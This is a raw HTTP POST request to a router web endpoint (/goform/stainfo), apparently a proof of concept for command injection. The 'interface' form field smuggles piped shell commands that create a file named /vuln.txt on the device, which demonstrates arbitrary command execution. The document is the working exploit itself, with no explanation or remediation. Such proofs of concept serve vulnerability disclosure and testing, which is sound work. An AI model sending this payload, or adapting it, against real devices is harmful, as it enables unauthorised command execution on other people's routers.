POST /goform/stainfo HTTP/1.1
Host: 192.168.2.1
Content-Length: 83
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Origin: http://192.168.2.1
Referer: http://192.168.2.1/probe.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

interface=ens33%20show%20stainfo%20%7C%20touch%20%2Fvuln.txt%20%7C%20iwpriv%20ens33
